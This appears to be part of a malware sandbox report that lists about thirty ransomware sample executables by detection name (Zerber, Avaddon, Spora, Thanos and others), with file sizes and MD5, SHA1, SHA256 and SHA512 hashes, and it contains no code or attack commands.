SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
264B
MD5ea4b8a77e7fcc144a99f0df1ed80ef28
SHA1528100a050eaf48719052ec8e192bf4753ba00a0
SHA256d0fff7c7c5abcbb31c6db6d1c225c8c48de81abcee4fbc6d3256f0ec5eabfaa0
SHA51277648fce6db8d4d5247581e40e5af919919e33663c504a675c5719228b61a3f1abef2a3693b6310bb4b065949a37d2f261e77432c4788e0ee6e49be7681fea1f
-
Filesize
23KB
MD536e46c94200c5a402ad5ee9ca1297b40
SHA1e3836d2ded612d83a6703e8acb022126b6673961
SHA2566cbcc96bad856dd4c93143fcf373c168658f220e0f4b7c09fda0a24483d14041
SHA5123a67c7d46dcace2b2af400ba9d233a7b9b8787e7a10b940de5e2db75d4036836e61c8cce197f2332dfc2422a7177987a88be186c8e6224962bf17efa4094bcde
-
Filesize
1006B
MD578ec8ad9d6d242ba4494c15920da7dc6
SHA1b75a5c1c62a07c0319dc138377a74a81ac1760c8
SHA256592ebc9728896179f4e39adb859252b476b580c72d7b1b8e61849ef93538666d
SHA5122d9334df97cdefdc9168e4697d73627ca8e2e4e4ae3e9439502f04ff9af11ade512e01e10c504e2aa882312fda9cc4829d3b6b54df98e85ec557053b657cca58
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe
Filesize3.9MB
MD52541462396902d3695028ac39cbc0e19
SHA1f587ed6eba930ca7d6717382010245c0b6abf1dd
SHA2565bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598
SHA51227b93878683e7af48042cb7c97b415b2d966d41afc74b9cd081cac65df9ae8d71047e44b750cffd253c878c3f61b55e6aa076a245a8c1f2868cfbe32bacad034
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe
Filesize5.3MB
MD585fb5ada4ea66aeeb5b06c1506fa2bea
SHA1925346953ab964c76d1fc322243d30b92547052d
SHA25639d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78
SHA512e607b2a41ea4207dec027eff54c151fe47e6d501705ec6e5e51eea56718285a8fa73608d27bba0157abbbc09f1a0f58b1045b4c748ba213857e83a183a3cbd01
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe
Filesize59KB
MD504f60dd495708663a410f38db90a5592
SHA1b2a517f140c0064dd7384c0aeee0c0471bcad126
SHA2564075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e
SHA5125058fed79826dc45acd7f77cfd3c080dbd708ddcda565c41d8c9e38bcd5aca9551b426abfe6033301833dd7f98783ff0d8da14b514e820de780295758376ecdc
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe
Filesize80KB
MD5768d9d9de52fe81defc6067168024547
SHA152a55e7edc842b4c8a19ee0342d0f9c21283fabe
SHA2562890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7
SHA5127d823035d841291d54fd167e4bbd9b404bdbf1baebc42427b41afb788a179eaf66eac9201d5b5dfd0ff61f32b9dbf11e7926e2cf41a1101e9818415fef43dd42
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe
Filesize1.2MB
MD5091ae195e390886f0959f6837676d7c6
SHA15815f32665b28ab11e3447e2e5053dfea298af18
SHA2567985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf
SHA5129e5c2d8c58ade4039102e8a49d1c463f10867da2686798293fc1c3ed4ee57c2f526d77890eb674b989d8b48b93fe0a3e88a2071c6580ed30c492bb0bbcf09e90
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Avaddon.gen-e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead.exe
Filesize74KB
MD55790ee7642277ac3ab4df17ba016754d
SHA1f1d92a433e7fe4e17c349ebabad629e4fb814af3
SHA256e53b7f74cba1228b9f406c04e0ec580f4597d6de93cb5cdbf51564fee4111ead
SHA512e652a3b02827ee7afb794f596d756ff0845c7e67cbef674991a5f3d9ea4bd672bf0d0d12a00df3c6b894eebb3421e1ea8f69c497af2d416bfed8ef0ccd8cb385
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Blocker.gen-218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59.exe
Filesize1.1MB
MD5f250bca9f7df36b2140ca5c716936494
SHA1e2836378b589782b24a25cad64a7b71941b7e89c
SHA256218e1a2d72b5baa1681b8d67abcbc8f8ab0681c6ff6d6d03283328458aadeb59
SHA51209ed5e7767b69d52587ad463f59a9b68de52fa0133433716b3adcce2e25650ef899dbfb70958373c7cd4164fc44bbfcb36b7be960fe2b091841dc6ffc965ddc5
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Convagent.gen-ba357fcd997b8634d3f3b2911571fd5b28ef28918e5a886be50cdcb83f1e99cc.exe
Filesize3.8MB
MD505d0ac40e94d0221a3118bfcd45f381f
SHA155c6c2ec87cf701f0a59d504e6ac46c8c2e1e219
SHA256ba357fcd997b8634d3f3b2911571fd5b28ef28918e5a886be50cdcb83f1e99cc
SHA512e41eeb104a61232a5a1c8fefee29656a31766759db57e6a80b32e2d659eba6c7f266919911906de0c7b3bf3b24bfb1fdf60c447556d1ac56dbe19bb7995a4cab
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Crypren.gen-e8e9f09ff9316c9362d40c9d203541b3f303d7ca351f11f0217ff0c814e810e8.exe
Filesize220KB
MD51eadf4aa41017fa95dcc39183bc48f5d
SHA12020a16e5d2f4696b61f96b173b6af8722b81268
SHA256e8e9f09ff9316c9362d40c9d203541b3f303d7ca351f11f0217ff0c814e810e8
SHA512555706f76cbe7415213f967ca5922025409d758ac1de77bbc8fda8099117eecf3804026d84ee3b13319bb09edb32e8194dee46ffd9705e1250f78728b909733d
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Encoder.gen-eb02bdfba5086198839622607bcafc345561dc32357c5f2d06c8868fb8c87af5.exe
Filesize2.8MB
MD597da73d15ab5132e5326f32d032cfc49
SHA1b7852e8f6730920db818f9c7cceae25e4bcc1370
SHA256eb02bdfba5086198839622607bcafc345561dc32357c5f2d06c8868fb8c87af5
SHA512f7569e455e49ae446ca4100c6500a474188afb8a82c44fe218c06dcc5d06278673f3263fe8a6a3d019744696c2223e945559d8efc64462f527353ef4c807691d
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Foreign.gen-278655e25418c6db554c6d3cbcf3f16738690e57a276a07ffbe8e6c45e1a21b9.exe
Filesize448KB
MD5974dda1be6d85ff82ea15173247114ef
SHA1c9d9c6d60df64a0131d459f7694999c13465b142
SHA256278655e25418c6db554c6d3cbcf3f16738690e57a276a07ffbe8e6c45e1a21b9
SHA512d9a7e9f8e5c14ab4de7dc9b90256a5e7e8472d3d143da72f5466d8fa210264383ff7e147fa076b16ac044b2bb7ce688fb7da072edb3eab0aa9355f69d21e1073
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Spora.gen-b665faa659b655f16f4625fcada4b07288836ac80f91ac7eb88bf16b5a20c1b3.exe
Filesize1013KB
MD5855cbd83cc28296b059f2173ef3e512f
SHA12b4cf59c57095278001e307571cb077b530a10fa
SHA256b665faa659b655f16f4625fcada4b07288836ac80f91ac7eb88bf16b5a20c1b3
SHA512a650b03356eadf6c25c5b4e72c2bf31f81170e4b1fd4c65d39fac3ce335d65f475294a26820535976365a99e46e0a73f73c7f2e90118a401315de6be7c0acacc
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.Win32.Zerber.pef-a44a932f0ae375fab03a7098806bec205b2692bd50fdb533c39c0eb94797feae.exe
Filesize240KB
MD5885d65249f0289d8b7c88ff90907d94a
SHA1153c9c416ff2b8edc88b67cedede0ed4b13d2c6d
SHA256a44a932f0ae375fab03a7098806bec205b2692bd50fdb533c39c0eb94797feae
SHA512f883760537eceb32595ee52eb1268efe22d86ed99c4f6489be191a153dcebd60f239488ff68eb41aee1b6541a8570a424be93c9da05b22385d5059fe2776215d
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Blocker.mrdd-ef1353cdb8be0bcb093014accdddf56281c05fb89e1fcc4a527907ae5b4bdfa6.exe
Filesize3.4MB
MD5bdaf3c0ec05b59de57825149feca706e
SHA12a8f421d992133ef36acb0e5fe475531277a44d0
SHA256ef1353cdb8be0bcb093014accdddf56281c05fb89e1fcc4a527907ae5b4bdfa6
SHA512a98686a5bed224ea4123796306bb52ff594b9174f99b752e03d1dd6020a10ecbac2def928b215990897f30b4aa4fb57a1909d80fe70fcb9deb2132d79aabee9a
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Crusis.to-55f111fa13c58f4e6eb6f9828621a463944b7de26fa09cff5a38c31f457def7d.exe
Filesize92KB
MD5050f90d26e4490b3930d4ca9ac45d26b
SHA1612d6d7a40229e45152dbd8a3563b2b28c809565
SHA25655f111fa13c58f4e6eb6f9828621a463944b7de26fa09cff5a38c31f457def7d
SHA5126d5f41e812a35b050e571530668cdf89b22390d6cda58c0511c754ee7ec56b2f7e0c683f946a8dc67265c0d14823d39a1a9057b310556b51290e36ccd3e429c7
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Crypmod.abtq-fd1096cb5bedfa8eb0bc020ec86133c26e2f3476d7d90ad4ff768352ce5c1e64.exe
Filesize148KB
MD5fffbf924a7f6e803a6427c4ba565e49d
SHA12768a5eea5f50cb0d91aeb1270acd6bfca54f270
SHA256fd1096cb5bedfa8eb0bc020ec86133c26e2f3476d7d90ad4ff768352ce5c1e64
SHA512b2fb7891328a1cb95e4128655c3ab439b2115f7f2af292d99aa0796a08189c90df4d5c792fdd62b94e39e5615632e421f02590224777230d1c8fa362255251a0
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Cryptodef.agcb-4ceda276c1fd39149c23c16990e1aaf3d4e109993d6404f247f0b4919bb39cc0.exe
Filesize5.5MB
MD5687dd7f9554ccf5e39cfa1fcbd950b0c
SHA13dbc4a64b2de460536f686e5f2d47ae07fa6cd07
SHA2564ceda276c1fd39149c23c16990e1aaf3d4e109993d6404f247f0b4919bb39cc0
SHA5122df2ca3fb48a1ddddb9a0ebeae678c22a14eba6ac7bbf4b1401bd260b92df5da39af42f843fd4a6ab313e8b9dcf6a8dea556ba6a88413f6f5124a7f98fc97645
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Cryptor.drw-7d3d67502966a38a02213eab1daa3e099bb44cdc5aa0875ab6db55b1a65d294e.exe
Filesize293KB
MD5dbdbdceeaaef63610cac5203b16efd21
SHA19c3da1fec2d45bd93a90c155438fe82887ddb665
SHA2567d3d67502966a38a02213eab1daa3e099bb44cdc5aa0875ab6db55b1a65d294e
SHA5125d88fd9c51e238ee53011c9388812643baac38d651aff3853aa60798b9a70709f0fb46799a9b9409e2611aa70609c63a0f17128bd37cadd6c34846fd65444a92
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Gen.web-7f05bf6fd7f5c5bfe0c201d73029439b228bc4d729306f7cea8077f03292fe63.exe
Filesize2.9MB
MD5fdc4436fa5700e2ff984d25dfcb19a72
SHA1d6503f42be986ef42fe20c39309111bad7602403
SHA2567f05bf6fd7f5c5bfe0c201d73029439b228bc4d729306f7cea8077f03292fe63
SHA512a21a29ae37488ceb331405c1f53fa8e795dc1744561fa57352c1dadbc82e01e0bdd2f3b5c03a1dcf3f0d7dfb71670cf0be88d702b8757c3b83ba592212d59cc1
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.GenericCryptor.iyf-721b2b38e67387f73ebad1c347c8190d222034cbf6527bcfe9053dde8fcdd3cc.exe
Filesize263KB
MD5dcadc504c887859715283b1ae4077d5e
SHA1254501db0bc3fb4a19ca95260f5b952d7281a459
SHA256721b2b38e67387f73ebad1c347c8190d222034cbf6527bcfe9053dde8fcdd3cc
SHA5121d0287d5135d98cfd4e26d2c37507a9721eb09f0db3335fba122f3784024b62982e65a61acf5ee7fe7a02a97e7bad2e9a7addd70856cd86912ba23d61a83a768
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Petr.aqv-78972cdde1a038f249b481ea2c4b172cc258aa294440333e9c46dcb3fbed5815.exe
Filesize71KB
MD5e9fdc21bd273444925a4512166188e5b
SHA1e398138686eedcd8ef9de5342025f7118e120cdf
SHA25678972cdde1a038f249b481ea2c4b172cc258aa294440333e9c46dcb3fbed5815
SHA51264989534f56fcd70f3ff08bb47a331d5624fc1e3b387420a885d6f32a537e05182de8c5890612cde03fdd312ad101955674d7455c84b900bf7eed97b402a2b08
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Zerber.bruy-b2f2ac6419392e3202cf057ef928104f795afb3e96747d85a62937cc6c7d8c9b.exe
Filesize353KB
MD56e352cd0e6130ec8e16c0a212f0ddfa2
SHA1fb4a19beb12dac8cc3ec5bf0544c2d7260dd8eac
SHA256b2f2ac6419392e3202cf057ef928104f795afb3e96747d85a62937cc6c7d8c9b
SHA5123b9776eb4de648bb550af2252d16d5708d01dbf89de518f9fcab00f5fb44a4cc7ab8fcf529a990f8c4c4dd79d664647d5eb72768c5c5eb2b5e3ceec9c279a164
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Zerber.eftm-c9ca22f2be98a84587dc0fabf28580095d7b8969b97c2c33fd75145a61e4a497.exe
Filesize311KB
MD5e58fe702b92dea9367c0a82cdbe9c861
SHA1856e74febf88aa0a3db481bfd3a4eab0245cdd3a
SHA256c9ca22f2be98a84587dc0fabf28580095d7b8969b97c2c33fd75145a61e4a497
SHA512310697032314ca4c75333d65a7d4ab8360bbc831daa4b1dcefc4dcd939db04cc0a7a2bf721e1eb4d6e58c1c4b0ae6fa04e9349b0d56e23f13dcf71aa4f91121a
-
C:\Users\Admin\Desktop\00398\Trojan-Ransom.Win32.Zerber.gcql-33f51bc65501f737c3411ddc0645a26b0777c912bf6b66a62e8cf7b433d04e9b.exe
Filesize625KB
MD5828dcdae96bf3729e803d09bdcb637d5
SHA12ecb0685626d6e7bd322f4d59ce9f1d34902fdc9
SHA25633f51bc65501f737c3411ddc0645a26b0777c912bf6b66a62e8cf7b433d04e9b
SHA512ec5db19410b5cf3c2b98e840384bfe6c4b23bcf35ed57fc4ee9e89c5a2df5af6c12be63532f60b1777f1860dffb8df662f9c285506963f80e2c3b4466cbbd51f
-
C:\Users\Admin\Desktop\00398\UDS-Trojan-Ransom.Win32.Encoder-c787c02fb6d846ba19b9b0d2413d613b463ea98b8baedefe97e9871ae9b99232.exe
Filesize213KB
MD5949ddda1f19a0ffc6826eac0b902c78a
SHA171aca7803c5c45f605206a0ddae2fabf508347a1
SHA256c787c02fb6d846ba19b9b0d2413d613b463ea98b8baedefe97e9871ae9b99232
SHA5128b703332e6f55fc729435a138426aeebacf87bd3b7618f8d4739b0f6e2e27f49aadbb8e0ded58114a64b531243cb3ec0055f489a4a746be0c0886f6c662a0645
-
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Convagent.gen-c12e3a1fb7e095bac2a4d0eba367b222396fa7c6a7f616a1040b1c22729a7d2a.exe
Filesize333KB
MD5acad6c504243265dac312f48b93cea67
SHA13a0ff83b8f71f6c8df168a1adc11499ee5c87f96
SHA256c12e3a1fb7e095bac2a4d0eba367b222396fa7c6a7f616a1040b1c22729a7d2a
SHA512a311b36a9fa12c790e84ff029bf0383ed66be638633a4d9e91b9611d024b3319462d4222e466144c91db4f1a2a88c1705a0219960ec8cbe538c740c666714e50
-
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Encoder.gen-c2b12d32b881483fa92e01f327950ddfd95bb6633e3f722076e4eb2e5f12e164.exe
Filesize2.7MB
MD52347a1b6ec11fafb5f4f885e1daa5f92
SHA10d4804df142c06187954ee0c8ebfbfe873d1958c
SHA256c2b12d32b881483fa92e01f327950ddfd95bb6633e3f722076e4eb2e5f12e164
SHA5129002abf4f9f0c29ff8dcf55c802608e3447ba1486210e7e2c0169e986eee3ca6fd22ff15038327811609d72aad0f33f7f39de8ca01dc86f77bdc7779eada271d
-
C:\Users\Admin\Desktop\00398\VHO-Trojan-Ransom.Win32.Encoder.gen-c7de7b5d38f057c98ecf3d3836d9620e6dacac6f42a4ad28a3c9bb24e8942e96.exe
Filesize5.9MB
MD5d61cfbee2b4293566aa7f4c1d2b5b18a
SHA1cd7be3b0a85dac82841551596fdebea7f9fa192e
SHA256c7de7b5d38f057c98ecf3d3836d9620e6dacac6f42a4ad28a3c9bb24e8942e96
SHA512e465e8862c227c310012a425f673690b984339fb007806049e79f82bdf5c13e4c3526cc4e2998a9959b0e59abc8a7012a6280edb672a90b33eb4fe230047a2f0